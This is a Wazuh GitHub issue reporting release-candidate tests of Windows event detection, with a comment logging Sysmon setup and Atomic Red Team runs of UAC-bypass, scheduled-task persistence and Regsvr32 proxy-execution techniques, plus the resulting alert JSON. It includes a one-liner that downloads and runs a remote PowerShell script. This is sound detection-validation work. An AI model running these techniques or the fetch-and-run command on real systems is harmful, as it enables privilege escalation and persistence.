
Release 4.3.6 - Release Candidate 1 - E2E UX tests - Windows events #3102

Closed
1 of 2 tasks
roronoasins opened this issue Jul 15, 2022 · 3 comments

Comments

@roronoasins
Contributor

roronoasins commented Jul 15, 2022

The following issue aims to run the specified test for the current release candidate, report the results, and open new issues for any encountered errors.

Test information

| Field | Value |
|---|---|
| Test name | Windows events |
| Category | Log data analysis |
| Deployment option | AWS - Installation assistant |
| Main release issue | wazuh/wazuh#14260 |
| OS | Windows Server 2022 |
| Release candidate # | RC1 |

Test environments

4.3.5

| Component | Deployment method | Environment |
|---|---|---|
| wazuh-indexer | installation assistant | Production |
| wazuh-server | installation assistant | Production |
| wazuh-dashboard | installation assistant | Production |
| wazuh-agent | Wazuh WUI one-liner deploy with custom group | Production |

4.3.6

| Component | Deployment method | Environment |
|---|---|---|
| wazuh-indexer | installation assistant | Development |
| wazuh-server | installation assistant | Development |
| wazuh-dashboard | installation assistant | Development |
| wazuh-agent | Wazuh WUI one-liner deploy with custom group | Development |

Test description

Test report procedure

All test results must have one of the following statuses:

🟢 All checks passed.
🔴 There is at least one failed check.
🟡 There is at least one expected to fail or skipped test and no failures.
🔵 In Progress
To Do

Any failing test must be properly addressed with a new issue, detailing the error and the possible cause.

An extended report of the test results must be attached as a zip or txt. Please attach any documents, screenshots or tables to the issue update with the results. This report can be used by the auditors to dig deeper into any possible failures and details.

Reported issues to review

| Status | Issue | Description | Severity |
|---|---|---|---|

Conclusions 🟡

All tests have been executed and the results can be found here.

| Status | Test | Failure type | Notes |
|---|---|---|---|
| 🟢 | Test that Windows data collection works out of the box. | | |
| 🟢 | Install Sysmon and create Wazuh rules as mentioned, to ensure that everything works as intended in the blog post (using current release under test instead of 4.2.0) | | |
| 🟡 | Check that for the same Windows events, the alerts rule ID is the same as in previous versions. | wazuh/wazuh#12977 | Issues were already reported in previous versions |

All tests have passed and the fails have been reported or justified. I, therefore, conclude that this issue is finished and OK for this release candidate.

However, the events and rules have not changed since the previous check so the already reported issue persists:

Issues

Detected issues and previously reported

Auditors' validation

The definition of done for this one is the validation of the conclusions and the test results from all auditors.

All checks from below must be accepted in order to close this issue.

@roronoasins
Contributor Author

Emulation of ATT&CK techniques and detection with Wazuh

Setting up the lab environment

Sysmon configuration

Mapping Sysmon rules with MITRE attack techniques
PS C:\Users\Administrator\Downloads\Sysmon> .\Sysmon64.exe -accepteula -i sysmonconfig.xml
System Monitor v13.34 - System activity monitor
By Mark Russinovich and Thomas Garnier
Copyright (C) 2014-2022 Microsoft Corporation
Using libxml2. libxml2 is Copyright (C) 1998-2012 Daniel Veillard. All Rights Reserved.
Sysinternals - www.sysinternals.com

Loading configuration file with schema version 4.60
Sysmon schema version: 4.81
Configuration file validated.
Sysmon64 installed.
SysmonDrv installed.
Starting SysmonDrv.
SysmonDrv started.
Starting Sysmon64...
Sysmon64 started.

Atomic Red Team installation

ART Execution Framework and Atomics folder installation
PS C:\Users\Administrator\Downloads\Sysmon> IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
>> Install-AtomicRedTeam -getAtomics
NuGet provider is required to continue
PowerShellGet requires NuGet provider version '2.8.5.201' or newer to interact with NuGet-based repositories. The NuGet provider must be available in 'C:\Program Files\PackageManagement\ProviderAssemblies' or 'C:\Users\Administrator\AppData\Local\PackageManagement\ProviderAssemblies'. You can also install the NuGet provider by running 'Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force'.
Do you want PowerShellGet to install and import the NuGet provider now?
[Y] Yes  [N] No  [S] Suspend  [?] Help (default is "Y"): Y
Installation of Invoke-AtomicRedTeam is complete. You can now use the Invoke-AtomicTest function
See Wiki at https://github.com/redcanaryco/invoke-atomicredteam/wiki for complete details
Importing the ART module
PS C:\Users\Administrator\Downloads\Sysmon> Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
Get details of a particular technique
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -ShowDetailsBrief
PathToAtomicsFolder = C:\AtomicRedTeam\atomics
T1548.002-1 Bypass UAC using Event Viewer (cmd)
T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
T1548.002-3 Bypass UAC using Fodhelper
T1548.002-4 Bypass UAC using Fodhelper - PowerShell
T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
T1548.002-6 Bypass UAC by Mocking Trusted Directories
T1548.002-7 Bypass UAC using sdclt DelegateExecute
T1548.002-8 Disable UAC using reg.exe
T1548.002-9 Bypass UAC using SilentCleanup task
T1548.002-10 UACME Bypass Method 23
T1548.002-11 UACME Bypass Method 31
T1548.002-12 UACME Bypass Method 33
T1548.002-13 UACME Bypass Method 34
T1548.002-14 UACME Bypass Method 39
T1548.002-15 UACME Bypass Method 56
T1548.002-16 UACME Bypass Method 59
T1548.002-17 UACME Bypass Method 61
T1548.002-18 WinPwn - UAC Magic
T1548.002-19 WinPwn - UAC Bypass ccmstp technique
T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Check/Get prerequisites of a technique
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites not met: T1548.002-10 UACME Bypass Method 23
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites not met: T1548.002-11 UACME Bypass Method 31
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites not met: T1548.002-12 UACME Bypass Method 33
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites not met: T1548.002-13 UACME Bypass Method 34
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites not met: T1548.002-14 UACME Bypass Method 39
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites not met: T1548.002-15 UACME Bypass Method 56
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Run the test for a particular technique
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd)
CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper
Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper
CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories
CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute
CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe
Prerequisites met: T1548.002-8 Disable UAC using reg.exe
CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task
Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task
CheckPrereq's for: T1548.002-10 UACME Bypass Method 23
Prerequisites not met: T1548.002-10 UACME Bypass Method 23
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\23 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-11 UACME Bypass Method 31
Prerequisites not met: T1548.002-11 UACME Bypass Method 31
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\31 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-12 UACME Bypass Method 33
Prerequisites not met: T1548.002-12 UACME Bypass Method 33
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\33 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-13 UACME Bypass Method 34
Prerequisites not met: T1548.002-13 UACME Bypass Method 34
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\34 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-14 UACME Bypass Method 39
Prerequisites not met: T1548.002-14 UACME Bypass Method 39
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\39 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-15 UACME Bypass Method 56
Prerequisites not met: T1548.002-15 UACME Bypass Method 56
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\56 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-16 UACME Bypass Method 59
Prerequisites not met: T1548.002-16 UACME Bypass Method 59
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\59 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-17 UACME Bypass Method 61
Prerequisites not met: T1548.002-17 UACME Bypass Method 61
        [*] UACME executable must exist on disk at specified location (%temp%\uacme\61 Akagi64.exe)

Try installing prereq's with the -GetPrereqs switch
CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic
Prerequisites met: T1548.002-18 WinPwn - UAC Magic
CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Clean-up on completion of the test
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd)
Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell)
Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper
Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell
Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell)
Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories
Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute
Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
The operation completed successfully.
Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe
Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task
Executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23
Executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31
Executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33
Executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34
Executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39
Executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56
Executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59
Executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61
Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic
Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique
Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique
Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique
Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique

Attack emulation with ART

T1053.005 – Scheduled Task/Job 🟢

GetPrereqs
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1053.005-1 Scheduled Task Startup Script
No Preqs Defined
GetPrereq's for: T1053.005-2 Scheduled task Local
No Preqs Defined
GetPrereq's for: T1053.005-3 Scheduled task Remote
No Preqs Defined
GetPrereq's for: T1053.005-4 Powershell Cmdlet Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-5 Task Scheduler via VBA
Attempting to satisfy prereq: Microsoft Word must be installed
You will need to install Microsoft Word manually to meet this requirement
Failed to meet prereq: Microsoft Word must be installed
GetPrereq's for: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
No Preqs Defined
GetPrereq's for: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
No Preqs Defined
GetPrereq's for: T1053.005-8 Import XML Schedule Task with Hidden Attribute
No Preqs Defined
Test run
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1053.005-1 Scheduled Task Startup Script
WARNING: The task name "T1053_005_OnLogon" already exists. Do you want to replace it (Y/N)? WARNING: The task name "T1053_005_OnStartup" already exists. Do you want to replace it (Y/N)?
Done executing test: T1053.005-1 Scheduled Task Startup Script
Executing test: T1053.005-2 Scheduled task Local
WARNING: The task name "spawn" already exists. Do you want to replace it (Y/N)?
Done executing test: T1053.005-2 Scheduled task Local
Executing test: T1053.005-3 Scheduled task Remote
ERROR: No mapping between account names and security IDs was done.
Done executing test: T1053.005-3 Scheduled task Remote
Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Register-ScheduledTask : Cannot create a file when that file already exists.
At line:6 char:1
+ Register-ScheduledTask AtomicTask -InputObject $object}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (PS_ScheduledTask:Root/Microsoft/...S_ScheduledTask) [Register-Scheduled
   Task], CimException
    + FullyQualifiedErrorId : HRESULT 0x800700b7,Register-ScheduledTask
Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing test: T1053.005-5 Task Scheduler via VBA
Done executing test: T1053.005-5 Task Scheduler via VBA
Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
cmdletOutput                                                    ReturnValue PSComputerName
------------                                                    ----------- --------------
MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\")           0
Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
The operation completed successfully.
SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created.
Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
cmdletOutput                                                      ReturnValue PSComputerName
------------                                                      ----------- --------------
MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\")           0
Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Cleanup
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1053.005 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Done executing cleanup for test: T1053.005-1 Scheduled Task Startup Script
Executing cleanup for test: T1053.005-2 Scheduled task Local
Done executing cleanup for test: T1053.005-2 Scheduled task Local
Executing cleanup for test: T1053.005-3 Scheduled task Remote
Done executing cleanup for test: T1053.005-3 Scheduled task Remote
Executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Done executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task
Executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Done executing cleanup for test: T1053.005-5 Task Scheduler via VBA
Executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Done executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task
Executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Done executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry
Executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Done executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute
Event log
Rule: 115001 (level 10) -> 'A Newly Scheduled Task has been Detected on EC2AMAZ-3188I1R'
{
  "win": {
    "system": {
      "providerName": "Microsoft-Windows-Sysmon",
      "providerGuid": "{5770385f-c22a-43e0-bf4c-06f5698ffbd9}",
      "eventID": "7",
      "version": "3",
      "level": "4",
      "task": "7",
      "opcode": "0",
      "keywords": "0x8000000000000000",
      "systemTime": "2022-07-18T15:17:32.8101722Z",
      "eventRecordID": "6086",
      "processID": "4508",
      "threadID": "92",
      "channel": "Microsoft-Windows-Sysmon/Operational",
      "computer": "EC2AMAZ-3188I1R",
      "severityValue": "INFORMATION",
      "message": "\"Image loaded:\r\nRuleName: technique_id=T1053,technique_name=Scheduled Task\r\nUtcTime: 2022-07-18 15:17:32.797\r\nProcessGuid: {a64f3178-798c-62d5-2f05-000000009000}\r\nProcessId: 3056\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nImageLoaded: C:\\Windows\\System32\\taskschd.dll\r\nFileVersion: 10.0.20348.1 (WinBuild.160101.0800)\r\nDescription: Task Scheduler COM API\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: taskschd.dll\r\nHashes: SHA1=F7151ED9C53B2095B2FF1294971C63C6F4739167,MD5=1A49668C0AD5E92F0CEF9F0EF99607A9,SHA256=98920100ECE3236CB579E24DB926CA66ACB05F7018F85DD9C40C1865F86D9041,IMPHASH=530A68E05D91DD5F4F3210E15EFA9CB5\r\nSigned: true\r\nSignature: Microsoft Windows\r\nSignatureStatus: Valid\r\nUser: EC2AMAZ-3188I1R\\Administrator\""
    },
    "eventdata": {
      "ruleName": "technique_id=T1053,technique_name=Scheduled Task",
      "utcTime": "2022-07-18 15:17:32.797",
      "processGuid": "{a64f3178-798c-62d5-2f05-000000009000}",
      "processId": "3056",
      "image": "C:\\\\Windows\\\\System32\\\\schtasks.exe",
      "imageLoaded": "C:\\\\Windows\\\\System32\\\\taskschd.dll",
      "fileVersion": "10.0.20348.1 (WinBuild.160101.0800)",
      "description": "Task Scheduler COM API",
      "product": "Microsoft® Windows® Operating System",
      "company": "Microsoft Corporation",
      "originalFileName": "taskschd.dll",
      "hashes": "SHA1=F7151ED9C53B2095B2FF1294971C63C6F4739167,MD5=1A49668C0AD5E92F0CEF9F0EF99607A9,SHA256=98920100ECE3236CB579E24DB926CA66ACB05F7018F85DD9C40C1865F86D9041,IMPHASH=530A68E05D91DD5F4F3210E15EFA9CB5",
      "signed": "true",
      "signature": "Microsoft Windows",
      "signatureStatus": "Valid",
      "user": "EC2AMAZ-3188I1R\\\\Administrator"
    }
  }
}
Dashboard event entry

[Dashboard screenshot of the T1053 event entry; image not preserved in this extract]

T1218.010 – Signed Binary Proxy Execution: Regsvr32 🟢

GetPrereqs
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010 -GetPrereqs
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution
Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
Prereq successfully met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct)
GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution
No Preqs Defined
GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq successfully met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL
Attempting to satisfy prereq: Test requires a renamed dll file
1 file(s) copied.
Prereq successfully met: Test requires a renamed dll file
GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll)
Test run
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Exception calling "Start" with "0" argument(s): "Access is denied"
At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:46 char:17
+                 $process.Start() > $null
+                 ~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : Win32Exception

Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing test: T1218.010-3 Regsvr32 local DLL execution
Done executing test: T1218.010-3 Regsvr32 local DLL execution
Executing test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing test: T1218.010-4 Regsvr32 Registering Non DLL
Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Cleanup
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1218.010 -Cleanup
PathToAtomicsFolder = C:\AtomicRedTeam\atomics

Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution
Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution
Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution
Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL
Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer
Event log
RuleName: technique_id=T1218.010,technique_name=Regsvr32
win.eventdata.ruleName: technique_id=T1218.010,technique_name=Regsvr32
{"win":{"system":{"providerName":"Microsoft-Windows-Sysmon","providerGuid":"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}","eventID":"7","version":"3","level":"4","task":"7","opcode":"0","keywords":"0x8000000000000000","systemTime":"2022-07-18T16:26:31.9219508Z","eventRecordID":"8823","processID":"4508","threadID":"92","channel":"Microsoft-Windows-Sysmon/Operational","computer":"EC2AMAZ-3188I1R","severityValue":"INFORMATION","message":"\"Image loaded:\r\nRuleName: technique_id=T1218.010,technique_name=Regsvr32\r\nUtcTime: 2022-07-18 16:26:31.907\r\nProcessGuid: {a64f3178-89b7-62d5-7f06-000000009000}\r\nProcessId: 5496\r\nImage: C:\\Windows\\System32\\regsvr32.exe\r\nImageLoaded: C:\\Windows\\System32\\scrobj.dll\r\nFileVersion: 5.812.10240.16384\r\nDescription: Windows ® Script Component Runtime\r\nProduct: Microsoft ® Windows ® Script Component Runtime\r\nCompany: Microsoft Corporation\r\nOriginalFileName: scrobj.dll\r\nHashes: SHA1=BAFFA3B8D2012F2A84278994CECD877B3364CE93,MD5=06CC2FB88C5DA8B13E6A31B3F6C6A0D5,SHA256=0D7AE861D31EFC7E2965DDE5074A906051B2814DD201B4A334ED2358245AEB97,IMPHASH=91B5CDDA29C7F7E7003EC3E46D9028BC\r\nSigned: true\r\nSignature: Microsoft Windows\r\nSignatureStatus: Valid\r\nUser: EC2AMAZ-3188I1R\\Administrator\""},"eventdata":{"ruleName":"technique_id=T1218.010,technique_name=Regsvr32","utcTime":"2022-07-18 16:26:31.907","processGuid":"{a64f3178-89b7-62d5-7f06-000000009000}","processId":"5496","image":"C:\\\\Windows\\\\System32\\\\regsvr32.exe","imageLoaded":"C:\\\\Windows\\\\System32\\\\scrobj.dll","fileVersion":"5.812.10240.16384","description":"Windows ® Script Component Runtime","product":"Microsoft ® Windows ® Script Component Runtime","company":"Microsoft Corporation","originalFileName":"scrobj.dll","hashes":"SHA1=BAFFA3B8D2012F2A84278994CECD877B3364CE93,MD5=06CC2FB88C5DA8B13E6A31B3F6C6A0D5,SHA256=0D7AE861D31EFC7E2965DDE5074A906051B2814DD201B4A334ED2358245AEB97,IMPHASH=91B5CDDA29C7F7E7003EC3E46D9028BC","signed":"true","signature":"Microsoft 
Windows","signatureStatus":"Valid","user":"EC2AMAZ-3188I1R\\\\Administrator"}}}
Dashboard event entry

1218

T1518.001 – Software Discovery: Security Software Discovery 🟢

GetPrereqs
PS C:\Users\Administrator\Downloads\Sysmon> Invoke-AtomicTest T1518.001 -GetPrereqs
